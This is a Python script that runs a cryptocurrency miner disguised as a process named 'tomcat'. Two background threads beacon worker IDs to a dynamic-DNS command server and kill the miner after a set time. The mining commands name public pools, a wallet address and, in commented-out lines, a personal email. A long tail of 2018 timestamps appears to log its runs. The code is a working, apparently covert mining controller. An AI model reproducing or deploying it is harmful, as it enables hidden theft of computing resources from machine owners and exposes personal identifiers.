import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:21:05.226181
#2018-02-17 17:08:05.888793
#2018-02-17 18:55:08.131561
#2018-02-17 20:43:07.820358
#2018-02-17 22:30:07.596146
#2018-02-18 00:13:05.396928
#2018-02-18 02:05:04.206698
#2018-02-18 03:52:01.875878
#2018-02-18 05:41:03.445449
#2018-02-18 07:33:04.166059
#2018-02-18 09:21:01.630401
#2018-02-18 11:07:03.485925
#2018-02-18 12:54:01.258641
#2018-02-18 14:40:01.455864
#2018-02-18 16:29:07.214002
#2018-02-18 18:18:02.231278
#2018-02-18 20:04:01.823873
#2018-02-18 21:50:02.127939
#2018-02-18 23:38:06.620337
#2018-02-19 01:24:04.624472
#2018-02-19 03:11:07.021382
#2018-02-19 04:56:07.398561
#2018-02-19 06:41:06.032197
#2018-02-19 08:31:01.918974
#2018-02-19 10:20:03.656478
#2018-02-19 12:08:07.196219
#2018-02-19 13:54:09.238665
#2018-02-19 15:44:09.629922
#2018-02-19 17:32:08.850092
#2018-02-19 19:21:07.026387
#2018-02-19 21:08:01.234605
#2018-02-19 22:55:05.751536
#2018-02-20 00:38:06.610336
#2018-02-20 02:27:07.480932
#2018-02-20 04:19:01.881885
#2018-02-20 06:03:01.463099
#2018-02-20 07:48:05.163572
#2018-02-20 09:33:06.540831
#2018-02-20 11:17:02.154357
#2018-02-20 13:03:04.354699
#2018-02-20 14:46:07.697119
#2018-02-20 16:31:09.695757
#2018-02-20 18:18:07.230407
#2018-02-20 20:09:05.643164
#2018-02-20 21:55:06.750661
#2018-02-20 23:37:05.038390
#2018-02-21 01:23:01.941008
#2018-02-21 03:11:01.798111
#2018-02-21 04:58:07.497999
#2018-02-21 06:46:01.951345
#2018-02-21 08:33:01.252130
#2018-02-21 10:18:04.293479
#2018-02-21 12:05:11.527129
#2018-02-21 13:53:02.202587
#2018-02-21 15:37:06.002051
#2018-02-21 17:27:05.267614
#2018-02-21 19:13:08.631518
#2018-02-21 20:59:08.974022
#2018-02-21 22:46:04.900234
#2018-02-22 00:37:05.248484
#2018-02-22 02:24:07.102477
#2018-02-22 04:11:07.633661
#2018-02-22 05:56:01.853178
#2018-02-22 07:43:04.034542
#2018-02-22 09:32:04.714117
#2018-02-22 11:17:01.883963
#2018-02-22 13:02:04.826441
#2018-02-22 14:51:06.075176
#2018-02-22 16:38:09.980181
#2018-02-22 18:23:08.259018
#2018-02-22 20:19:01.390146
#2018-02-22 22:04:06.277488
#2018-02-22 23:50:10.782119
#2018-02-23 01:39:01.723978
#2018-02-23 03:25:03.902335
#2018-02-23 05:11:06.992609
#2018-02-23 06:57:03.519088
#2018-02-23 08:48:06.928719
#2018-02-23 11:07:04.629031
#2018-02-23 13:00:14.858701
#2018-02-23 14:45:03.047572
#2018-02-23 16:35:08.567339
#2018-02-23 18:21:06.242907
#2018-02-23 20:05:03.739418
#2018-02-23 21:53:06.102089
#2018-02-23 23:43:03.565708
#2018-02-24 01:37:06.606998
#2018-02-24 03:28:04.670201
#2018-02-24 05:14:03.945868
#2018-02-24 07:02:04.043117
#2018-02-24 08:36:05.248276
#2018-02-24 10:09:06.687676
#2018-02-24 11:57:03.737503
#2018-02-24 13:22:05.643510
#2018-02-24 14:57:01.950118
#2018-02-24 16:31:02.223108
#2018-02-24 18:05:08.643032
#2018-02-24 19:35:08.237454
#2018-02-24 21:11:04.229174
#2018-02-24 23:14:07.039998
#2018-02-25 01:35:01.591392
#2018-02-25 04:57:02.132895
#2018-02-25 09:32:02.071704